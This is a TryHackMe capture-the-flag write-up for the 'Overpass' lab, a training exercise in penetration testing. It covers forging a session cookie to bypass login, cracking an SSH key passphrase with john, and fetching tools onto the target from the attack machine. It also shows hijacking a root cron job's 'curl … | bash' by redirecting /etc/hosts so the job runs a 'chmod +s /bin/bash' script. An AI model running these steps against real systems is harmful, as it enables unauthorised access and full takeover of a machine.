TryHackMe Room: https://tryhackme.com/room/overpass
New Day, New Room. Today we are attempting the OverPass room.
I boot up my AttackBox and machine, the machine in question is
First, I do a preliminary nmap scan:
root@ip-x-x-x-x:~# nmap -sV 10.10.224.184 Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-09 15:57 BST Nmap scan report for ip-10-10-224-184.eu-west-1.compute.internal (10.10.224.184) Host is up (0.0011s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) MAC Address: 02:D2:A2:85:F6:47 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds
We can see we have a way in for SSH access on port 22, and we also have a webserver running on port 80. I browse around the website but do not really see anything too interesting. There are some downloads and source code for a password-to-file application. Next, let’s fire up gobuster to see if we have any common directories:
root@ip-x-x-x-x:~# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u 10.10.224.184 Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart) [+] Url: http://10.10.224.184 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s 2021/07/09 15:55:52 Starting gobuster /aboutus (Status: 301) /admin (Status: 301) /css (Status: 301) /downloads (Status: 301) /img (Status: 301) /index.html (Status: 301) 2021/07/09 15:55:53 Finished
admin directory is of interest. Let’s check that out!
We are greeted with an admin login page. I checked the source code to see if there was any comments left in the code but did not see anything. One interesting file with this webpage is the
login.js file. It shows us that the form submits to
/api/login and then will return
statusOrCookie that will be either
"Incorrect credentials" or it will a token that is set using
Cookies.set("SessionToken",statusOrCookie). This looks like a promissing attack vector.
Another possible route may be SQL injection. I am going to test a common set of passwords like
admin:password123 and see if that gives us anything, then try some SQL injection. If all else fails, I want to check to see if we can just set our own SessionToken and grant ourselves access.
SQL Injection did not work, but setting the SessionToken cookie and refreshing so it sends over the headers did work! It provides us with an SSH private key for ‘James’. Also mentions it is crackable. First I am just going to copy the contents and see if we can login with the key alone.
I copied the key to
~/.ssh/id_rsa and did a
chmod 400 ~/.ssh/id_rsa to set permissions to read only by us, and finally
ssh -i ~/.ssh/id_rsa 10.10.224.184 to attempt to login.
Looks like we will be cracking the passphrase after all. First we need to convert the key to a hash using ssh2john.py – which I don’t know where it is so find + grep will help me out:
root@ip-x-x-x-x:/usr/bin# locate "ssh2john.py" /opt/john/ssh2john.py
Now we just use
python /opt/john/ssh2john.py ~/.ssh/id_rsa > id_rsa.hash to get the hash file.
Next I did a
locate rockyou to find the word list and we can use the hash file with a wordlist to crack the passphrase:
root@ip-x-x-x-x:~# john id_rsa.hash /usr/share/wordlists/rockyou.txt --format=SSH
Within a few seconds we get the passphrase! Now let’s ssh back in to james’ account.
ssh -i ~/.ssh/id_rsa [email protected]
And we can
cat user.txt for the first flag!
Now we need to privesc to get root permissions.
First, I try running
sudo -l to see what commands we can run as sudo, however it immediately asks us for a password that we do not know.
I am going to grab a copy of LinEnum.sh and get it on the machine to run and see what all we have to work with:
# First, we need to get the file on our attack machine wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh # Next, start a web server in the dir to transfer the file python -m "http.server" 3333 # Now, on the target machine, grab the file wget https://attack-machine-ip:3333/LinEnum.sh # Set executable chmod +x LinEnum.sh # Save the results out ./LinEnum.sh > results.txt # and lets parse through them cat results.txt | more
I’m parsing through the results and these items stand out:
- Two admin users of
- Super user account
- Home directory of
tryhackmeis set to only allow that user to read from it (vs our home directory is readable by all)
- The crontab executes a
curl overpass.thm/downloads/src/buildscript.sh | bashas root every minute
- This is our way in. I ran a
cat /etc/hostsand see that
overpass.thmjust points back to localhost, which means the file is here on the machine.
- It seems like the files might be in the /root or /tryhackme folders. So we cannot get to those yet.
- This is our way in. I ran a
I went back a little and checked the perms of the hosts file with
ls -la /etc/hosts and it shows that everyone is able to read and write to hosts!! So we can create a file on our machine in the directory /downloads/src/buildscript.sh and have it do what we want. The easiest thing is to
chmod +s /bin/bash so when we run it, we get root privileges.
So that’s exactly what I did! I started a python web server with
python3 -m "http.server" 80 in a directory that had the folder structure of /downloads/src/buildscript.sh. Then I modified the /etc/hosts on the target machine to point overpass.thm to my attack machine’s IP. After a minute, I saw the call come in and it grabbed the file!
Now I just needed to call
/bin/bash -p and ran
whoami and it said
cat /root/root.txt gives us the final flag.